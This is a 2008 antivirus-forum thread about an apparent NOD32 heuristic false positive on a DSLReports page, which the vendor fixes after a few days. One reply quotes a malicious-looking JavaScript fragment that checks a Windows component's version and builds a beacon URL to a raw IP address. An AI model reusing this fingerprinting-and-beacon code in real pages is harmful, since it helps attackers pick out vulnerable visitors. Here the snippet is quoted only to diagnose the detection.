Warning from NOD32 on DSLR-security-forum thread

Discussion in 'NOD32 version 2 Forum' started by FanJ, Nov 22, 2008.

Thread Status:
Not open for further replies.
  1. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,564
    Posting in this thread at DSLR Security forum:
    http://www.dslreports.com/forum/r21467816-Key-Logger-586523233

     
  2. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,564
    The thread at the DSLR board on which NOD32 gives a warning, is this one:

    hxxp://www.dslreports.com/forum/r21054284-Trojan-Win32Agentpz-from-Stoneybrook-Assisted-Living-site

    (I have changed http into hxxp)

    That thread is two pages long on my machine and I get the warning on the second page.

    I have already send an IM to Marcos here on the Wilders board.
    I completely understand that it is weekend and that ESET has at the moment not the time to look at it.
    I hope that they will have a look at it after the weekend (please).
     
  3. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,564
    Maybe the following two screenshots are too big.

    IMON warning
     

    Attached Files:

  4. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,564
    AMON warning
     

    Attached Files:

  5. ASpace

    ASpace Guest

    Do you suspect that the javascript detection is false positive ?
     
  6. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,564
    Hi HiTech_boy,

    Somehow that is indeed what I'm thinking.
    I hardly can believe that there is a malware on the DSLR/BBR security forum.
    The warning I am getting, is making me thinking of an heuristic detection.
    I cannot have a look at that second page because NOD is blocking it and I do not want to disable NOD at this moment.
    If I see any warning from NOD32 on a file, of course I would send it in in a password protected ZIP-file; but what to do in this case? That's why I have send Marcos an IM here at Wilders.
     
  7. doktornotor

    doktornotor Registered Member

    Joined:
    Jul 19, 2008
    Posts:
    2,047
    There's no malicious JS in there... this gets triggered on the plaintext code listing there. Already been debated before with some other example:

    Code:
    var i,l,v;  
    num = 2;  
    s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';  
    l = testing.isComponentInstalled(s,'ComponentID');  
    v = testing.getComponentVersion(s,'ComponentID');  
    if (l == true) {  
    x = v.split(',');  
    if ( (x[0]!=0) && (x[2]<3810) ) {  
    num = 1;  
         }  
       }  
      
    c = 'http://58.65.232.33/'+'counter.php'+'?b='+num;
    Try to paste the above between <HTML><BODY><PRE> paste here </PRE></BODY></HTML> tags and save the file as test.html or whatever and watch NOD32 to quarantine it.
     
  8. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,564
    said by doktornotor:
    Hi,

    Where has this been debated before?
     
  9. doktornotor

    doktornotor Registered Member

    Joined:
    Jul 19, 2008
    Posts:
    2,047
    Cannot find the debate ATM, anyway same problem - some code pasted in plaintext on a website that doesn't get executed at all triggered this. This one is apparently heuristics issue specific to NOD32, tried w/ Avira Premium, no such false positive. Reproduced w/ v3 and v4 beta as well.
     
  10. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,564
    OK, thanks for checking it !

    Let's hope that ESET will jump in too (haven't heard back from Marcos yet; but as I said, it is the weekend now).
     
  11. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,564
    As for this moment: no official reply from ESET (neither here in public, nor at the DSLR/BBR board in public, nor in private from Marcos).
    Like I said, I know that it is the weekend; but I would have liked a reply like "we will look at it". But even that did not happen.
     
  12. ASpace

    ASpace Guest

    Currently with update 3634 , I no longer see any alerts and I can browse the forum
     
  13. doktornotor

    doktornotor Registered Member

    Joined:
    Jul 19, 2008
    Posts:
    2,047
    Yeah, looks good now. :thumb:
     
  14. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    2,564
    Yep, it's fixed :thumb:

    Thank you ESET, and thank you Marcos for your IM. I really do appreciate it !
     
Thread Status:
Not open for further replies.